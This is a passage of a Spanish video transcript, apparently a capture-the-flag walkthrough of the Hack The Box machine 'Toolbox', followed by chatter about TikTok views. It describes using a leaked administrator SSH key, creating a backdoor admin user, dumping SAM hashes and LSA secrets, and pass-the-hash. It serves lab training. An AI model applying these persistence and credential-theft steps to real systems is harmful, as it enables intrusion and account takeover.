coma. FG. Reset. Con una XTER. Y ahora sí. Export. De la TER. Que valga XTER. Y export de la shell que valga bash. Ahí está. SSH Docker. Se me va la IP if config. SSH Docker arroba 172.17.0.1. Y era TC user, ¿no? Ahí está. Pues ahora sí, export de la TER que valga XTER. Esto ya lo había hecho. Export de la shell que valga bash. Esto ya lo había hecho.
Este tratamiento ya lo había hecho. Ok, vale. Habíamos visto que hay un... ¿Clear? Habíamos visto que hay un directorio C, amigos. Vamos a meternos a este directorio. Y habíamos visto que también teníamos un TUsers. Y ojo, ¿qué estructura es esta? Bueno, pues esta es una estructura... Cuando ganamos acceso a una máquina con sistema operativo Windows, ¿no? En este caso tenemos la carpeta de administrador. Si yo, por ejemplo, me voy a administrator... perdón. Cd administrator, ls-la. Y vale, tenemos todo el directorio directamente del usuario administrator. Y ojito. Ok. Ok, tenemos una ID, posiblemente una ID RCA.sh del usuario administrator. Y ojito. Tenemos su ID RCA del usuario administrator. Si ustedes se dan cuenta, vean cómo todos y cada uno pueden ver este fichero. Una gran cagada, ¿no? Si hacemos un cat a ID RCA, bueno, pues aquí tendríamos la ID RCA del usuario administrador. Y si es esta, vámonos para acá. Vamos a copiar todo esto. Vamos a cerrar esto. Control C. Por ejemplo, y aquí en Content me voy a crear con Nano, me voy a crear un archivito que se va a llamar id-rsa. Pegamos la id rsa del usuario administrator, guardamos. Le damos permisos de ejecución 600 para que solamente yo, el propietario, pueda leer y escribir. Ahí está. Y recuerden esto, teníamos el puerto 22 habilitado. Y creo que si ahora sí, creo que ahora sí podemos de alguna manera entrar si esta IDRCA es válida. Por ejemplo, con SSH vamos a proporcionar una IDRCA que sería la IDRCA del usuario administrator arroba de la 10.10.10.236 y vamos a ver si nos deja pasar. Y bueno, esto ya me suda la polla. Si hacemos un WAMI administrator. Quiero pensar que nos podemos meter desktop a la carpeta desktop. Si hacemos un dir, si hacemos un type a root.txt. Esta sería la flag como el usuario administrador, ¿vale? Poca enumeración, mucha enumeración. Dependiendo mucho de cómo la estén haciendo ustedes, pero bueno, esta sería la flag como el usuario administrador. Y ahora sí, ¿no? Ahora sí podemos hacer nuestras maldades, como por ejemplo, lo que podemos hacer aquí directamente es crearnos un usuario. Si hacemos un net users, vamos a ver cuáles son los usuarios que están. Y bueno, aquí sí existe el usuario Tony, ¿vale? SSHD y de resto, pues nada más el usuario administrador, default y West. Bueno, con net vamos a ver el firewall, cómo está activado, cómo se encuentra con net sh. Sh sería add firewall, show all pro... Profiles. Y vale, off. Vale, todos están en off. Entonces aquí sí me puedo crear un usuario con net user raptor. Vamos a ponerle raptor R como contraseña. Vamos a poner rrap12 dólar porcentaje. Y vamos a añadirlo, ¿vale? Vamos a crearlo. Ahí está. Ahora vamos a añadir al usuario Raptor al grupo local de administradores, administrators
a Raptor. ADD. Perdón, al revés. Y ahí está. ¿Cómo podríamos validar esto? Bueno, pues si nos pasamos acá a la 4 y con crackmapexec mediante smb vamos a validar si el usuario Raptor es válido. Raptor. Y como password vamos a ponerle que aquí habíamos puesto lrap 12 dólar porcentaje, y si nos pone un postnet es que el usuario Raptor ahora está en el grupo de administradores y podemos hacer lo que se nos venga en gana. Chéquense esto, nos pone un postnet. Y ahora sí, podemos dumpear la SAM. Vamos, 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 vamos. Ojito, dumping SAM hashes. Vamos a obtener todos los hashes directamente de la memoria. Y si tenemos el usuario del usuario administrador, podemos hacer pass de hash. Tenemos el de West, de Found Account, WD Agu Utility Account, el del usuario Tony, que ya habíamos visto que no era válido. Y el del usuario Raptor, ¿vale? Bueno, tenemos todos estos, podríamos decirse, hashes, y ustedes saben que obteniendo los hashes, como por ejemplo el del usuario administrador, podemos hacer pass de hash sin necesario de ver la contraseña, de proporcionar la contraseña, perdón. Si nosotros tratamos de dumpear los secretos, vamos a ver si podemos dumpear los secretos. Ojito, cuando dumpeamos los secretos, en ocasiones podemos llegar a ver los algún password en texto plano. Esto siempre háganlo ustedes cuando ganan acceso a una máquina con sistema operativo Windows. Porque de alguna manera, obteniendo password, ustedes ya pueden empezar a hacer más cosillas si están en un domain controller. ¿Vale? Eso hay que tenerlo siempre, siempre bien en cuenta. Vamos a darle un tiempecito. Les está tardando ahí un poquito. Sí, se está tardando mucho. Esto lo vamos a dejar, yo creo que pendiente directamente. Y bueno, amigos, pues esta fue la máquina Tollbox de la plataforma de Hacktbox. La verdad es que fue una máquina, podríamos decirse, algo nuevo directamente. Tratando de averiguar si... Ojo, Tollbox, Administrator. ¿Y qué es esto? Ojo. A ver, vamos a copiarnos esto. Vamos a validar si esta contraseña es del usuario administrador y si es correcta. Vamos a pegarla por aquí y aquí vamos a ponerle Administrator. Vamos a ver si nos pone un postnet. Es que sí. Y nos pone un postnet. Vean cómo a veces hay que dumpear los secretos para que podamos obtener en ocasiones credenciales correctas, ¿vale? En este caso, imagínense que no hayamos ganado acceso como el usuario administrador. Pero tenemos acceso como al grupo local de administradores. Bueno, si dumpeamos los secretos, en ocasiones podemos llegar a obtener una credencial en texto, podemos decir, plano. Y bueno, amigos, pues esta fue la máquina Tollbox de la plataforma de Hacktbox. Chula, la verdad, porque bueno, pues de alguna manera obtenemos cosillas. Vamos a cambiarnos para acá. Nuevos conocimientos, nuevas formas de poder realizar ataques directamente, ¿no? Como ven, ay, a mí ya me dolió la espalda. Ya me dolió un poquito la espalda. Pero chula la máquina, chulita la máquina. Y bueno, a ver, vamos a ver cómo va esto de lo del TikTok, que soy medio... Chéquense esto, ahora sí creo que me pasé de lanza, ¿eh?
70.200 vistas. Bueno, pues creo que esto ha superado mi rango, mi expectativa de los videos. Creo que ahora sí el algoritmo hizo su chamba. La verdad es que ahora sí hizo su chamba y se puso a trabajar. Porque en otras ocasiones, hijo de... Nada, no es cierto. En otras ocasiones, prácticamente, pues... O mi contenido está de la mierda. O de plano no me quiere apoyar TikTok. Pero bueno, pues ahora sí hizo su chamba. Estoy teniendo buenas reproducciones y la verdad que estoy muy, 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 muy feliz con eso. Y bueno, pues esta fue la máquina Tollbox, amigos. Me dio mucho gusto estar aquí con ustedes el día de hoy. Ustedes saben que yo traigo máquinas sí o sí y estoy directamente pues haciendo cosillas todo el tiempo. Estoy tratando de aprender nuevas cosas y también compartir de lo que yo estoy haciendo, ¿vale? Si ustedes en algún momento quieren pasarse por aquí, adelante, son bienvenidos. Entonces, mis amigos, cuídense mucho, estamos en contacto, no dejen de estudiar, no dejen de hacer sus cosas y nos vemos hasta la próxima, ¿vale? Cuídense mucho. Chao.